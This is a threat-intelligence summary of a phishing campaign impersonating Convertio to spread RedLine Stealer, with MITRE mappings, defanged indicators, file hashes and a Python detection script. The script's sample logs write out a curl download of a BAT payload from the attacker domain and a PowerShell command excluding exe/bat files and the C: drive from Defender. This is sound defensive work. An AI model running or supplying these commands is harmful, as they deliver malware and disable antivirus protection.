CRIL identified a phishing site impersonating Convertio that delivers the RedLine Stealer payload. The campaign uses a ZIP containing a shortcut to download BAT files, bypass Defender, and install an EXE that exfiltrates data to a C2 server. #RedLineStealer #Convertigoto
Key points
- The phishing site at hxxps://convertigoto.net/ impersonates Convertio to lure users into using an online file converter.
- The delivery chain relies on a ZIP containing a shortcut file (YourConvertedFile.lnk) that, when run, downloads BAT files (2.bat and 3.bat) from the attacker’s server.
- 3.bat executes PowerShell commands to add Defender exclusions (exe, bat extensions and C: path) to evade antivirus protection.
- 3.bat downloads the final payload YourConvertedFile59417.exe (renamed to 1.exe) and launches it, enabling execution of the RedLine Stealer.
- RedLine Stealer’s capabilities include stealing browser data, wallet info, and data from various apps, collecting system information, and exfiltrating to its C2 server.
- Adversaries use a MaaS model for RedLine Stealer and leverage legitimate online tools to maximize reach.
- IoCs include the phishing domain, distribution URLs, the ZIP/LNK/BAT/EXE file names, and related file hashes.
MITRE Techniques
- [T1566] Phishing – The attacker creates a fake file converter phishing site impersonating Convertio. Quote: “…phishing site, hxxps://convertigoto.net/, that impersonated a genuine ‘Convertio’ website.”
- [T1204] User Execution – Infections begin when users click the “download” button on the phishing site. Quote: “the actual infection starts when the user clicks on the ‘download’ button present in the phishing site.”
- [T1064] Scripting – The downloader uses command-line tools to fetch payloads (via curl) from attacker URLs. Quote: “using ‘curl executable’ and executed after renaming it to ‘1.exe’.”
- [T1059] Command and Scripting Interpreter – 3.bat runs PowerShell commands to modify security settings (Add-MpPreference) to evade detection. Quote: “PowerShell commands to add the file extensions (‘exe’ & ‘bat’) and drive path (‘C:’) to the exclusion list of Windows Defender.”
- [T1105] Ingress Tool Transfer – The BAT/EXE payloads are downloaded from attacker URLs using curl. Quote: “downloads an executable payload … from the below URL using ‘curl’ executable…”
- [T1071] Application Layer Protocol – The RedLine Stealer communicates with its C2 using a SOAP API. Quote: “uses a SOAP API to communicate with its C&C server.”
- [T1003] OS Credential Dumping / Credential Access – RedLine Stealer is capable of stealing information from browsers, wallets, and applications. Quote: “stealer is capable of stealing information from web browsers, cryptocurrency wallets, and applications such as FileZilla, Discord, Steam, Telegram, and VPN clients.”
- [T1057] Process Discovery – The campaign references a process tree showing how the shortcut-based downloads execute. Quote: “process tree of shortcut file downloads.”
- [T1082] System Information Discovery – RedLine collects OS, hardware, processes, antivirus, and installed programs. Quote: “collects information about the infected machine, such as OS, system hardware, running processes, antivirus products, installed programs, and system language.”
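The two behaviours mapped above that leave the clearest host-side trail are the curl download of BAT/EXE payloads and the PowerShell Add-MpPreference call that excludes whole extensions and the C: drive from Defender. The following detection script is an added example, not code from the original report: it runs over a few constructed process-creation events (JSON, one per line, in the shape a SIEM might keep for Sysmon Event ID 1 or Security 4688) and flags both patterns, rating a drive-root or exe/bat exclusion higher than a narrow one.

```python
import json
import re
# Constructed sample events (not from the original report), one JSON object per line,
# shaped like process-creation records; URLs are defanged (hxxps) as on the page.
SAMPLE_LOGS = r"""
{"ts": "2022-10-14T09:01:02Z", "host": "WS01", "parent": "cmd.exe", "image": "curl.exe", "cmdline": "curl -o C:\\Users\\Public\\3.bat hxxps://convertigoto.net/cc/flesd/3.bat"}
{"ts": "2022-10-14T09:01:05Z", "host": "WS01", "parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell -Command Add-MpPreference -ExclusionExtension exe,bat -ExclusionPath C:\\"}
{"ts": "2022-10-14T09:30:00Z", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell -Command Add-MpPreference -ExclusionPath 'C:\\Program Files\\Backup'"}
{"ts": "2022-10-14T09:31:00Z", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell -Command Get-MpPreference"}
"""

ADD_MP = re.compile(r"add-mppreference", re.I)
EXCL_EXT = re.compile(r"-exclusionextension\s+(\S+)", re.I)
EXCL_PATH = re.compile(r"-exclusionpath\s+(\"[^\"]+\"|'[^']+'|\S+)", re.I)
DRIVE_ROOT = re.compile(r"^['\"]?[a-z]:\\?['\"]?$", re.I)     # e.g. C:\ or C:
RISKY_EXT = {"exe", "bat", "cmd", "ps1", "dll"}               # extensions a dropper needs excluded
FETCH = re.compile(r"\bcurl\b.*?(?:hxxp|http)s?://\S+\.(?:bat|exe)\b", re.I)

def classify(event):
    """Return (rule, severity) for one process-creation event, or None."""
    cmd = event.get("cmdline", "")
    if ADD_MP.search(cmd):
        m_ext = EXCL_EXT.search(cmd)
        exts = {e.strip().lower().lstrip(".") for e in m_ext.group(1).split(",")} if m_ext else set()
        m_path = EXCL_PATH.search(cmd)
        path = m_path.group(1) if m_path else ""
        # A whole drive or executable extensions excluded: the pattern 3.bat uses
        if exts & RISKY_EXT or DRIVE_ROOT.match(path):
            return ("defender_exclusion_broad", "high")
        return ("defender_exclusion_change", "medium")
    if FETCH.search(cmd):
        return ("script_payload_download", "high")
    return None

def scan(log_text):
    """Parse one JSON event per line and return the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hit = classify(event)
        if hit:
            findings.append({"ts": event["ts"], "host": event["host"], "rule": hit[0], "severity": hit[1]})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['ts']} {f['host']} {f['severity'].upper():6} {f['rule']}")
```

Defender also records exclusion changes itself (Microsoft-Windows-Windows Defender/Operational Event ID 5007), so the same rule can be applied to those events as a second, tamper-independent source.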
Indicators of Compromise
- [URL] Phishing site – hxxps://convertigoto.net/
- [URL] Malware distribution – hxxps://convertigoto.net/cc/flesd/3.bat
- [URL] Malware distribution – hxxps://convertigoto.net/cc/flesd/2.bat
- [URL] Malware distribution – hxxps://convertigoto.net/cc/flesd/YourConvertedFile59417.exe
- [File] LNK file – YourConvertedFile.lnk – contained in the ZIP archive
- [File] BAT file – 3.bat – downloaded by the shortcut
- [File] EXE file – YourConvertedFile59417.exe – payload downloaded and executed
- [File] ZIP archive – YourConvertedFile634643.zip – contains the LNK and BATs
- [Hash] Zip file – MD5: 0350d40da8135fe9c8c61a939602dedd, SHA1: 6e30860d6b5c6348d7143f74b2ad734eee716da3, SHA256: 1089a26c46bb0e5a247593e5defd80503dc0d4950ee522f1de54fca99b1c21f6
- [Hash] LNK file – MD5: 8be13313460c5f1befb20a1051f9f850, SHA1: 9e1dafcd668cb89d82ae85806d5b67f54509cb55, SHA256: f74b170a7f8258bc8824f0f5efad26e8081f793cc1c4d5282a5fcc43c3d71368
- [Hash] BAT file “3.bat” – MD5: 209b97fe681f86b71162153b4ddbce32, SHA1: 18ddf2b3f414a970cc3915dc69b8d06eff55d4da, SHA256: 70f56299a49fdb0994adfff42b3d4b74f7036193d8a783ee8223180bf0b30bed
- [Hash] Exe file – MD5: 303c63a7c8d3b15c72e079e720fc4ae4, SHA1: 9dac60afed2565c94ed3e1716032a9d989f82307, SHA256: eb7d31a5a641b057aa250442dc5252d4214ca282632ebd24a79644fe358fbe18
Read more: https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/